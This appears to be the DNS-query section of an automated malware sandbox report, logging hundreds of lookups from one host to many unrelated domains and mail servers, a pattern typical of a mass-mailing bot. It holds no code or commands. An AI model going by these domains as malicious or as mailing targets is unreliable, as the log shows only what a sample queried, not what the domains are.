                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:39.985825062 CEST192.168.2.48.8.8.80xe7ecStandard query (0)plaske.uaA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:39.987641096 CEST192.168.2.48.8.8.80x2052Standard query (0)mxs.mail.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:40.021579027 CEST192.168.2.48.8.8.80xd51fStandard query (0)alt4.gmail-smtp-in.l.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:40.083868027 CEST192.168.2.48.8.8.80x8d99Standard query (0)gmail-smtp-in.l.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:40.090532064 CEST192.168.2.48.8.8.80x50fcStandard query (0)clysma.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:40.090682983 CEST192.168.2.48.8.8.80x7d1dStandard query (0)leapc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:40.106122971 CEST192.168.2.48.8.8.80x5222Standard query (0)atb-lit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:40.107091904 CEST192.168.2.48.8.8.80x27aStandard query (0)smitko.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:40.107944012 CEST192.168.2.48.8.8.80xf841Standard query (0)pleszew.policja.gov.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:40.109318972 CEST192.168.2.48.8.8.80x9625Standard query (0)isom.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:40.124134064 CEST192.168.2.48.8.8.80xed10Standard query (0)sigtoa.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:40.125837088 CEST192.168.2.48.8.8.80xd1eStandard query (0)mijash3.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:40.180460930 CEST192.168.2.48.8.8.80xe0f3Standard query (0)cjborden.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:40.184222937 CEST192.168.2.48.8.8.80x144fStandard query (0)actmin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:40.189209938 CEST192.168.2.48.8.8.80x4c32Standard query (0)orlyhotel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:40.224709988 CEST192.168.2.48.8.8.80xd549Standard query (0)esmoke.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:40.258615017 CEST192.168.2.48.8.8.80x88e1Standard query (0)chzko.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:40.263741970 CEST192.168.2.48.8.8.80x698bStandard query (0)magicomm.co.ukA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:40.315247059 CEST192.168.2.48.8.8.80x925aStandard query (0)chzko.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:40.333348989 CEST192.168.2.48.8.8.80xa112Standard query (0)in1.smtp.messagingengine.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:40.376851082 CEST192.168.2.48.8.8.80x6888Standard query (0)hchc.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:40.378808975 CEST192.168.2.48.8.8.80xcdefStandard query (0)willsub.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:40.389463902 CEST192.168.2.48.8.8.80x3384Standard query (0)leapc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:40.390419960 CEST192.168.2.48.8.8.80x70f7Standard query (0)ludomemo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:40.390881062 CEST192.168.2.48.8.8.80x948aStandard query (0)missnue.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:40.391357899 CEST192.168.2.48.8.8.80x26d1Standard query (0)daytonir.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:40.399125099 CEST192.168.2.48.8.8.80x273fStandard query (0)piacton.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:40.399861097 CEST192.168.2.48.8.8.80x9f80Standard query (0)mail7.digitalwaves.co.nzA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:40.479317904 CEST192.168.2.48.8.8.80x6dfcStandard query (0)fogra.com.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:40.508994102 CEST192.168.2.48.8.8.80x3061Standard query (0)kumaden.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:40.513441086 CEST192.168.2.48.8.8.80x69cfStandard query (0)pellys.co.ukA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:40.515100956 CEST192.168.2.48.8.8.80x39c6Standard query (0)simetar.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:40.525856018 CEST192.168.2.48.8.8.80x64aStandard query (0)adeesa.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:40.603506088 CEST192.168.2.48.8.8.80xf4b4Standard query (0)multip.huA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:40.657391071 CEST192.168.2.48.8.8.80xddbbStandard query (0)piacton.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:40.690891981 CEST192.168.2.48.8.8.80x2f38Standard query (0)ldh.la.govA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:40.696121931 CEST192.168.2.48.8.8.80x321aStandard query (0)mackusick.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:40.696121931 CEST192.168.2.48.8.8.80x89feStandard query (0)multip.huA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:40.696158886 CEST192.168.2.48.8.8.80x7488Standard query (0)yoruksut.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:40.696233988 CEST192.168.2.48.8.8.80xe0ebStandard query (0)host.doA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:40.698230028 CEST192.168.2.48.8.8.80xb5dcStandard query (0)n23china.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:40.699198008 CEST192.168.2.48.8.8.80xcdc5Standard query (0)johnlyon.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:40.700217009 CEST192.168.2.48.8.8.80x5771Standard query (0)106west.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:40.704329014 CEST192.168.2.48.8.8.80x33f7Standard query (0)clinicasanluis.com.coA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:40.706756115 CEST192.168.2.48.8.8.80xf93fStandard query (0)flamingorecordings.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:40.720923901 CEST192.168.2.48.8.8.80x1104Standard query (0)piacton.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:40.722744942 CEST192.168.2.48.8.8.80xf40fStandard query (0)adeesa.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:40.734322071 CEST192.168.2.48.8.8.80x62a0Standard query (0)n23china.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:40.754811049 CEST192.168.2.48.8.8.80xe54Standard query (0)mackusick.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:40.758768082 CEST192.168.2.48.8.8.80x191fStandard query (0)vivastay.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:40.763154984 CEST192.168.2.48.8.8.80x7ffaStandard query (0)multip.huA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:40.784120083 CEST192.168.2.48.8.8.80x49f3Standard query (0)wanoa.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:40.795447111 CEST192.168.2.48.8.8.80xfb6eStandard query (0)techtrans.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:40.812293053 CEST192.168.2.48.8.8.80x7ddbStandard query (0)shittas.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:40.815150976 CEST192.168.2.48.8.8.80x6f94Standard query (0)hbfuels.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:40.817696095 CEST192.168.2.48.8.8.80xfbc7Standard query (0)n23china.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:40.821300983 CEST192.168.2.48.8.8.80x420eStandard query (0)jnf.atA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:40.832484007 CEST192.168.2.48.8.8.80xeab8Standard query (0)uster.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:40.852338076 CEST192.168.2.48.8.8.80xc34eStandard query (0)muhr-soehne.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:40.852597952 CEST192.168.2.48.8.8.80xbc8fStandard query (0)tcpoa.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:40.879575968 CEST192.168.2.48.8.8.80x9ecaStandard query (0)webavant.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:40.909737110 CEST192.168.2.48.8.8.80x9069Standard query (0)apcotex.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:40.924247026 CEST192.168.2.48.8.8.80x5c18Standard query (0)sgk.home.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:40.959146023 CEST192.168.2.48.8.8.80x7c5dStandard query (0)wahw.com.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:40.959146023 CEST192.168.2.48.8.8.80x319dStandard query (0)bggs.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:40.967134953 CEST192.168.2.48.8.8.80x692eStandard query (0)hyab.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:40.996612072 CEST192.168.2.48.8.8.80x68aStandard query (0)www.muhr-soehne.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:41.038218975 CEST192.168.2.48.8.8.80x99abStandard query (0)www.fnw.usA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:41.043334961 CEST192.168.2.48.8.8.80x3cbaStandard query (0)tabbles.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:41.051650047 CEST192.168.2.48.8.8.80xd561Standard query (0)sinwal.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:41.090333939 CEST192.168.2.48.8.8.80x50fcStandard query (0)clysma.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:41.128345966 CEST192.168.2.48.8.8.80x5831Standard query (0)lyto.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:41.141724110 CEST192.168.2.48.8.8.80xcef3Standard query (0)impexnc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:41.192334890 CEST192.168.2.48.8.8.80xeecfStandard query (0)nekono.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:41.192631006 CEST192.168.2.48.8.8.80xc36eStandard query (0)duiops.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:41.199914932 CEST192.168.2.48.8.8.80x144fStandard query (0)actmin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:41.243952036 CEST192.168.2.48.8.8.80xdf35Standard query (0)coxkitchensandbaths.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:41.249556065 CEST192.168.2.48.8.8.80xa96dStandard query (0)ccssinc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:41.271531105 CEST192.168.2.48.8.8.80xdba0Standard query (0)portoccd.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:41.275384903 CEST192.168.2.48.8.8.80x5fc2Standard query (0)zugseil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:41.360630989 CEST192.168.2.48.8.8.80x7061Standard query (0)diamir.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:41.375827074 CEST192.168.2.48.8.8.80x59a7Standard query (0)agitz.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:41.396030903 CEST192.168.2.48.8.8.80x543Standard query (0)stopllc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:41.407582998 CEST192.168.2.48.8.8.80x43b9Standard query (0)c-drop.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:41.413666964 CEST192.168.2.48.8.8.80x822dStandard query (0)atb-lit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:41.415469885 CEST192.168.2.48.8.8.80x7d5bStandard query (0)aba.org.egA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:41.426263094 CEST192.168.2.48.8.8.80x1151Standard query (0)awal.wsA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:41.434824944 CEST192.168.2.48.8.8.80x8a31Standard query (0)agitz.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:41.440773010 CEST192.168.2.48.8.8.80xf127Standard query (0)cbras.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:44.149152994 CEST192.168.2.48.8.8.80x144fStandard query (0)actmin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:44.153107882 CEST192.168.2.48.8.8.80xb23bStandard query (0)agitz.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:44.158103943 CEST192.168.2.48.8.8.80x7aa6Standard query (0)juso-gr.chA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:44.173430920 CEST192.168.2.48.8.8.80x9d63Standard query (0)actmin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:44.174240112 CEST192.168.2.4192.203.230.100x9dStandard query (0)comNS (Name server)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:44.193018913 CEST192.168.2.48.8.8.80x7c59Standard query (0)juso-gr.chA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:44.193320990 CEST192.168.2.4128.8.10.900xcbStandard query (0)orgNS (Name server)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:44.227907896 CEST192.168.2.48.8.8.80x8fe3Standard query (0)juso-gr.chA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:44.486469984 CEST192.168.2.48.8.8.80xf2faStandard query (0)awal.wsA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:44.672797918 CEST192.168.2.48.8.8.80x2424Standard query (0)redgiga.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:45.215292931 CEST192.168.2.48.8.8.80x71d2Standard query (0)kevyt.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:45.268394947 CEST192.168.2.48.8.8.80x9d63Standard query (0)actmin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:45.966875076 CEST192.168.2.48.8.8.80x181fStandard query (0)shanks.co.ukA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:46.109572887 CEST192.168.2.4192.36.148.170x84Standard query (0)comNS (Name server)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:46.145550013 CEST192.168.2.4128.8.10.900xd2Standard query (0)orgNS (Name server)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:46.147922993 CEST192.168.2.48.8.8.80x86f0Standard query (0)enguita.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:46.148307085 CEST192.168.2.48.8.8.80x64b8Standard query (0)gujarat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:46.148372889 CEST192.168.2.48.8.8.80x2edcStandard query (0)paraski.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:46.148825884 CEST192.168.2.48.8.8.80x6ef1Standard query (0)shiner.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:46.149247885 CEST192.168.2.48.8.8.80xfa67Standard query (0)oaith.caA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:46.149693966 CEST192.168.2.48.8.8.80xa45dStandard query (0)oh28ya.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:46.150094032 CEST192.168.2.48.8.8.80x8daeStandard query (0)karila.frA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:46.150506973 CEST192.168.2.48.8.8.80x2661Standard query (0)missnue.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:46.150885105 CEST192.168.2.48.8.8.80x9fbStandard query (0)webways.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:46.313441992 CEST192.168.2.48.8.8.80x397cStandard query (0)at-shun.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:46.314457893 CEST192.168.2.48.8.8.80x119Standard query (0)e-asset.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:46.315135956 CEST192.168.2.48.8.8.80x31c6Standard query (0)siongann.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:46.315542936 CEST192.168.2.48.8.8.80x3607Standard query (0)bggs.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:46.315668106 CEST192.168.2.48.8.8.80x9705Standard query (0)slower.itA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:46.316008091 CEST192.168.2.48.8.8.80xbe51Standard query (0)zemarmot.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:46.316103935 CEST192.168.2.48.8.8.80xb77dStandard query (0)cbras.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:46.317203045 CEST192.168.2.48.8.8.80x9819Standard query (0)shanks.co.ukA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:46.318016052 CEST192.168.2.48.8.8.80x4b0bStandard query (0)webband.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:46.318135023 CEST192.168.2.48.8.8.80x792Standard query (0)juso-gr.chA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:46.318526030 CEST192.168.2.48.8.8.80xa12fStandard query (0)yoruksut.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:46.318917990 CEST192.168.2.48.8.8.80x662eStandard query (0)michiana.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:46.419929028 CEST192.168.2.48.8.8.80x9d63Standard query (0)actmin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:46.467068911 CEST192.168.2.48.8.8.80x1e36Standard query (0)aiolos-sa.grA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:46.529795885 CEST192.168.2.48.8.8.80x54baStandard query (0)samtv.roA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:46.530128002 CEST192.168.2.48.8.8.80xf82dStandard query (0)e-kami.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:46.530675888 CEST192.168.2.48.8.8.80xc887Standard query (0)ftchat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:46.531158924 CEST192.168.2.48.8.8.80x5ee0Standard query (0)johnlyon.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:46.531589985 CEST192.168.2.48.8.8.80x6ef3Standard query (0)bd-style.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:46.532068014 CEST192.168.2.48.8.8.80xad6eStandard query (0)akr.co.idA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:46.532505989 CEST192.168.2.48.8.8.80xc056Standard query (0)calvinly.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:46.532988071 CEST192.168.2.48.8.8.80x1f05Standard query (0)vivastay.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:46.533385992 CEST192.168.2.48.8.8.80x46bStandard query (0)cvswl.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:46.535518885 CEST192.168.2.48.8.8.80x661dStandard query (0)touchfam.caA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:46.536686897 CEST192.168.2.48.8.8.80x7b1aStandard query (0)usadig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:46.581475973 CEST192.168.2.48.8.8.80xa873Standard query (0)webband.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:46.623739958 CEST192.168.2.48.8.8.80xb384Standard query (0)dog-jog.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:46.624748945 CEST192.168.2.48.8.8.80xd7d4Standard query (0)cjcagent.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:46.624869108 CEST192.168.2.4192.5.5.2410xe7Standard query (0)comNS (Name server)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:46.629898071 CEST192.168.2.48.8.8.80x14ecStandard query (0)fr-dat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:46.642060995 CEST192.168.2.4198.32.64.120xb1Standard query (0)orgNS (Name server)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:46.889172077 CEST192.168.2.48.8.8.80x5921Standard query (0)yhsll.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:46.890055895 CEST192.168.2.48.8.8.80x2beeStandard query (0)from30ty.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:46.968715906 CEST192.168.2.48.8.8.80xcd8aStandard query (0)cubodown.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:46.969027996 CEST192.168.2.48.8.8.80x88bStandard query (0)someikan.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:47.049279928 CEST192.168.2.48.8.8.80xa9d9Standard query (0)captlfix.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:47.051712036 CEST192.168.2.48.8.8.80x5689Standard query (0)n23china.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:47.053272009 CEST192.168.2.48.8.8.80x5d06Standard query (0)popbook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:47.054790020 CEST192.168.2.48.8.8.80xab5eStandard query (0)scip.org.ukA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:47.116709948 CEST192.168.2.48.8.8.80xf78bStandard query (0)mijash3.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:47.162221909 CEST192.168.2.48.8.8.80x5eeaStandard query (0)ascc.org.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:47.165438890 CEST192.168.2.48.8.8.80xae64Standard query (0)onzcda.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:47.189389944 CEST192.168.2.48.8.8.80xc06Standard query (0)kavram.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:47.216476917 CEST192.168.2.48.8.8.80xe251Standard query (0)refintl.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:47.216639996 CEST192.168.2.48.8.8.80xd981Standard query (0)karila.frA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:47.219314098 CEST192.168.2.48.8.8.80x32fdStandard query (0)nekono.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:47.220591068 CEST192.168.2.48.8.8.80x7b12Standard query (0)willsub.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:47.307992935 CEST192.168.2.48.8.8.80x3530Standard query (0)htsmx.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:47.313491106 CEST192.168.2.48.8.8.80xac7cStandard query (0)cjcagent.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:47.378277063 CEST192.168.2.48.8.8.80x8d4aStandard query (0)likangds.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:47.380734921 CEST192.168.2.48.8.8.80xd4fcStandard query (0)sledsport.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:47.453262091 CEST192.168.2.48.8.8.80x12c2Standard query (0)webavant.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:47.460164070 CEST192.168.2.48.8.8.80x1395Standard query (0)jsaps.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:47.460256100 CEST192.168.2.48.8.8.80x4b0bStandard query (0)webband.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:47.460546970 CEST192.168.2.48.8.8.80x397cStandard query (0)at-shun.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:47.476624012 CEST192.168.2.48.8.8.80xa343Standard query (0)awfraser.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:47.547874928 CEST192.168.2.48.8.8.80xac6Standard query (0)dspears.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:47.548352003 CEST192.168.2.48.8.8.80xad6eStandard query (0)akr.co.idA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:47.667140961 CEST192.168.2.48.8.8.80xa5f0Standard query (0)ftmobile.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:47.769437075 CEST192.168.2.48.8.8.80xaad2Standard query (0)ikulani.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:47.769608974 CEST192.168.2.48.8.8.80x6c8Standard query (0)wnit.orgA (IP address)IN (0x0001)false
